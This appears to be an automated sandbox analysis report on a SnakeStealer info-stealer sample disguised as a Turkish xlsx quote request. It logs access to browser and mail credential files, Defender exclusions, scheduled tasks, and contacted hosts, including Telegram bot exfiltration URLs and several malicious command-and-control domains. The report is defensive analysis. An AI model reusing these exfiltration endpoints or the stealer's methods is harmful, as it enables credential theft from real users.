                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Yara matchFile source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7944, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: YzkHZRBcm.exe PID: 6504, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7944, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: YzkHZRBcm.exe PID: 6504, type: MEMORYSTR
                    Source: Yara matchFile source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: YzkHZRBcm.exe PID: 6504, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Native API
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Web Service
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    111
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    13
                    System Information Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    3
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Scheduled Task/Job
                    3
                    Obfuscated Files or Information
                    Security Account Manager11
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Screen Capture
                    11
                    Encrypted Channel
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing
                    NTDS1
                    Process Discovery
                    Distributed Component Object Model1
                    Email Collection
                    3
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets31
                    Virtualization/Sandbox Evasion
                    SSH1
                    Input Capture
                    14
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                    Virtualization/Sandbox Evasion
                    DCSync1
                    System Network Configuration Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                    Process Injection
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528049 Sample: TEKL#U0130F TALEP VE F#U013... Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 api.telegram.org 2->48 50 2 other IPs or domains 2->50 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus detection for URL or domain 2->62 68 16 other signatures 2->68 8 TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe 7 2->8         started        12 YzkHZRBcm.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 file5 38 C:\Users\user\AppData\Roaming\YzkHZRBcm.exe, PE32 8->38 dropped 40 C:\Users\...\YzkHZRBcm.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmpA1D9.tmp, XML 8->42 dropped 44 TEKL#U0130F TALEP ...#U0130_xlsx.exe.log, ASCII 8->44 dropped 70 Adds a directory exclusion to Windows Defender 8->70 72 Injects a PE file into a foreign processes 8->72 14 TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        74 Multi AV Scanner detection for dropped file 12->74 76 Machine Learning detection for dropped file 12->76 24 YzkHZRBcm.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 api.telegram.org 149.154.167.220, 443, 49828, 49871 TELEGRAMRU United Kingdom 14->52 54 reallyfreegeoip.org 188.114.96.3, 443, 49729, 49740 CLOUDFLARENETUS European Union 14->54 56 checkip.dyndns.com 132.226.247.73, 49722, 49744, 49754 UTMEMUS United States 14->56 78 Loading BitLocker PowerShell Module 18->78 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        80 Tries to steal Mail credentials (via file / registry access) 24->80 82 Tries to harvest and steal browser information (history, passwords, etc) 24->82 36 conhost.exe 26->36         started        signatures9 process10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe53%ReversingLabsByteCode-MSIL.Trojan.SnakeStealer
                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\YzkHZRBcm.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\YzkHZRBcm.exe53%ReversingLabsByteCode-MSIL.Trojan.SnakeStealer
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    http://checkip.dyndns.org0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    http://varders.kozow.com:80810%URL Reputationsafe
                    http://aborters.duckdns.org:8081100%URL Reputationmalware
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://checkip.dyndns.org/0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                    http://anotherarmy.dns.army:8081100%URL Reputationmalware
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://checkip.dyndns.org/q0%URL Reputationsafe
                    https://reallyfreegeoip.org0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    188.114.96.3
                    truetrue
                      unknown
                      api.telegram.org
                      149.154.167.220
                      truetrue
                        unknown
                        checkip.dyndns.com
                        132.226.247.73
                        truefalse
                          unknown
                          checkip.dyndns.org
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:07:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              unknown
                              https://reallyfreegeoip.org/xml/8.46.123.33false
                              • URL Reputation: safe
                              unknown
                              http://checkip.dyndns.org/false
                              • URL Reputation: safe
                              unknown
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2020:57:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000031C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://duckduckgo.com/chrome_newtabTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://duckduckgo.com/ac/?q=TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.orgTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://api.telegram.org/botTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20aTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://www.office.com/lBTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000031C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://checkip.dyndns.orgTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://chrome.google.com/webstore?hl=enYzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003198000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003189000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://www.ecosia.org/newtab/TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://varders.kozow.com:8081TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://aborters.duckdns.org:8081TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmptrue
                                                • URL Reputation: malware
                                                unknown
                                                https://ac.ecosia.org/autocomplete?q=TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://reallyfreegeoip.org/xml/8.46.123.33$TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.000000000307B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://anotherarmy.dns.army:8081TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmptrue
                                                • URL Reputation: malware
                                                unknown
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://checkip.dyndns.org/qTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://chrome.google.com/webstore?hl=enlBTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000003073000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003193000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://reallyfreegeoip.orgTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003051000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1377186980.0000000003341000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000A.00000002.1419410557.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
